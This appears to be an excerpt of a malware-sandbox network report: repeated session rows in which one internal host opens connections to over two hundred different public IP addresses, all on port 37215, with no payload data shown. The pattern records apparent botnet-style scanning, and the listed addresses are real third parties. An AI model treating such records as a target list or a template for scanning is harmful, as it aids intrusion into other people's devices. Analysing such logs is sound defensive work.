                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22541192.168.2.1542648157.128.62.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22542192.168.2.154894086.179.136.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22543192.168.2.155345494.44.36.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22544192.168.2.1560588190.13.179.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22545192.168.2.1546902181.185.67.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22546192.168.2.154956831.24.36.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22547192.168.2.155615645.3.40.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22548192.168.2.1553438190.189.103.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22549192.168.2.1550716181.128.33.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22550192.168.2.1542372156.17.19.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22551192.168.2.1545104157.145.65.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22552192.168.2.155499245.124.185.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22553192.168.2.1554814156.152.72.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22554192.168.2.154795441.22.160.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22555192.168.2.1559978138.81.220.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22556192.168.2.154374037.138.115.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22557192.168.2.1555096121.114.253.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22558192.168.2.155971437.69.102.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22559192.168.2.1539216222.221.119.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22560192.168.2.1539862102.101.63.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22561192.168.2.1550236190.217.45.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22562192.168.2.1544682156.112.185.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22563192.168.2.15534161.25.113.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22564192.168.2.153686641.92.176.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22565192.168.2.1540360157.86.243.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22566192.168.2.1555256181.32.182.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22567192.168.2.1534738121.151.135.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22568192.168.2.1544570181.77.107.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22569192.168.2.153992445.155.235.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22570192.168.2.1554830186.246.134.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22571192.168.2.1536156138.133.205.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22572192.168.2.1545564222.150.161.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22573192.168.2.153881041.240.185.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22574192.168.2.1545522222.106.245.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22575192.168.2.1549134222.121.64.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22576192.168.2.1541188138.105.243.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22577192.168.2.1558122222.150.12.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22578192.168.2.154428031.18.13.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22579192.168.2.154538231.29.110.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22580192.168.2.1539054156.93.246.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22581192.168.2.154769637.188.130.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22582192.168.2.1540088156.149.194.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22583192.168.2.1553724222.230.117.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22584192.168.2.1551880102.223.129.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22585192.168.2.1539082122.89.173.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22586192.168.2.1554950102.157.68.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22587192.168.2.1557816156.156.215.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22588192.168.2.155848045.149.253.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22589192.168.2.1542480121.229.216.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22590192.168.2.1535302138.42.73.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22591192.168.2.154936245.214.231.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22592192.168.2.154231437.117.128.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22593192.168.2.1551116122.66.12.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22594192.168.2.1557478122.157.166.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22595192.168.2.1533256122.161.26.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22596192.168.2.1548224157.251.12.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22597192.168.2.154120845.169.216.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22598192.168.2.153837245.129.176.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22599192.168.2.1541732138.13.150.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22600192.168.2.1547348186.118.23.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22601192.168.2.15470502.118.13.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22602192.168.2.1539720122.16.234.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22603192.168.2.1537164157.43.73.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22604192.168.2.154159294.72.81.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22605192.168.2.1539708102.67.62.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22606192.168.2.1533466181.9.52.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22607192.168.2.1559606102.126.89.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22608192.168.2.153553041.13.254.25037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22609192.168.2.156038045.186.230.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22610192.168.2.153642437.225.200.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22611192.168.2.153313841.106.20.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22612192.168.2.1539202157.73.180.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22613192.168.2.154276245.54.246.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22614192.168.2.1559844186.238.86.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22615192.168.2.155186245.144.41.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22616192.168.2.1537990222.244.88.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22617192.168.2.1557430138.20.89.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22618192.168.2.1533278102.99.40.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22619192.168.2.1551546102.36.185.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22620192.168.2.154096445.198.249.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22621192.168.2.1533604138.41.64.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22622192.168.2.1551716222.212.62.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22623192.168.2.1545294186.6.212.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22624192.168.2.154349831.220.68.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22625192.168.2.1536950186.215.135.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22626192.168.2.1555186122.162.58.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22627192.168.2.1554534138.67.22.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22628192.168.2.153494631.214.188.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22629192.168.2.1540872102.157.186.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22630192.168.2.1555974156.63.20.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22631192.168.2.1543408157.163.50.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22632192.168.2.154904841.37.122.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22633192.168.2.1551014102.193.55.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22634192.168.2.1552844156.220.173.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22635192.168.2.154296231.117.234.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22636192.168.2.1554552122.94.124.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22637192.168.2.1538968102.74.168.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22638192.168.2.1552048186.189.63.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22639192.168.2.155448441.202.12.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22640192.168.2.1552846102.236.118.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22641192.168.2.153771441.12.250.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22642192.168.2.154969841.104.87.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22643192.168.2.154004645.252.242.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22644192.168.2.155738294.158.83.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22645192.168.2.155341294.124.94.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22646192.168.2.155449837.183.86.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22647192.168.2.1546648122.80.88.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22648192.168.2.153983845.117.171.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22649192.168.2.1557040102.26.151.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22650192.168.2.1547366181.105.234.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22651192.168.2.1538802222.228.21.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22652192.168.2.155521294.184.139.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22653192.168.2.1557666156.210.7.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22654192.168.2.153636094.92.31.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22655192.168.2.155790494.68.248.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22656192.168.2.1552906121.175.166.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22657192.168.2.156079645.71.36.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22658192.168.2.1552318181.240.239.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22659192.168.2.154817837.187.94.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22660192.168.2.1536984186.4.197.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22661192.168.2.154024837.199.76.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22662192.168.2.1552286190.121.157.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22663192.168.2.1542736122.94.142.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22664192.168.2.1537570156.32.157.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22665192.168.2.1537782121.98.46.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22666192.168.2.1540264190.201.68.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22667192.168.2.1560908156.7.222.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22668192.168.2.1556956157.122.62.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22669192.168.2.1560334102.143.71.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22670192.168.2.1538204181.202.96.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22671192.168.2.1550346122.231.15.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22672192.168.2.154135637.192.131.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22673192.168.2.1539636172.2.69.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22674192.168.2.1544672157.165.108.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22675192.168.2.1537208156.244.70.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22676192.168.2.1543566222.241.173.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22677192.168.2.155750845.114.233.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22678192.168.2.1539260156.144.66.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22679192.168.2.1549284222.206.49.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22680192.168.2.1560648190.89.77.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22681192.168.2.1536542156.87.6.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22682192.168.2.1544690138.194.11.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22683192.168.2.1533230186.7.112.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22684192.168.2.1559672181.162.182.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22685192.168.2.1547600121.225.111.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22686192.168.2.154691037.75.104.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22687192.168.2.1535662157.203.53.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22688192.168.2.153869631.109.88.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22689192.168.2.1556562186.4.106.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22690192.168.2.1540860121.21.246.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22691192.168.2.1536232138.240.148.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22692192.168.2.154853831.125.42.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22693192.168.2.1542912222.199.140.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22694192.168.2.1554312186.212.180.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22695192.168.2.1560642102.50.66.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22696192.168.2.1550842190.91.190.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22697192.168.2.1548894222.7.66.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22698192.168.2.1545152102.1.184.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22699192.168.2.1543016190.55.212.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22700192.168.2.155507845.34.158.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22701192.168.2.154837031.102.7.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22702192.168.2.1551256186.108.173.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22703192.168.2.1535742222.164.155.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22704192.168.2.1547208102.159.57.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22705192.168.2.1554242197.240.30.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22706192.168.2.1550856157.255.174.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22707192.168.2.1551866181.71.95.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22708192.168.2.155697894.143.119.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22709192.168.2.1536596156.9.247.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22710192.168.2.1548608222.48.149.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22711192.168.2.154023445.143.38.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22712192.168.2.1556364121.216.14.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22713192.168.2.154547641.124.203.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22714192.168.2.154695885.91.107.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22715192.168.2.153353445.76.164.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22716192.168.2.1538134222.116.138.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22717192.168.2.1545902157.61.90.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22718192.168.2.1558752190.247.104.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22719192.168.2.155125431.88.233.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22720192.168.2.1553416102.51.240.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22721192.168.2.155803837.137.214.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22722192.168.2.154185241.176.5.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22723192.168.2.1560626197.207.157.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22724192.168.2.155155237.176.171.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22725192.168.2.1549616186.79.57.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22726192.168.2.1542508181.249.94.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22727192.168.2.1540212156.124.166.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22728192.168.2.1553426197.33.78.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22729192.168.2.155587037.200.116.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22730192.168.2.1551664157.57.61.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22731192.168.2.1546102190.102.73.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22732192.168.2.155720841.199.117.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22733192.168.2.1555676157.175.100.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22734192.168.2.1547456156.182.226.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22735192.168.2.1554466121.238.189.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22736192.168.2.1560768122.144.9.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22737192.168.2.1553208157.205.32.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22738192.168.2.1544838186.51.1.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22739192.168.2.1544374181.80.134.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22740192.168.2.1540980156.214.187.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22741192.168.2.1551306138.209.181.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22742192.168.2.153785694.124.222.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22743192.168.2.155858645.204.184.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22744192.168.2.1558234122.18.83.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22745192.168.2.1547342222.200.174.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22746192.168.2.155014245.148.231.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22747192.168.2.1558266122.127.248.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22748192.168.2.154208631.255.216.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22749192.168.2.1549680222.83.2.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22750192.168.2.1551122156.132.227.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22751192.168.2.154244037.128.239.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22752192.168.2.153302645.196.43.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22753192.168.2.156028641.247.105.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22754192.168.2.1551022222.202.154.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22755192.168.2.1556068181.80.146.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22756192.168.2.1544766156.174.229.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22757192.168.2.155827870.188.20.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22758192.168.2.1545368156.104.171.21437215
                                              TimestampBytes transferredDirectionData


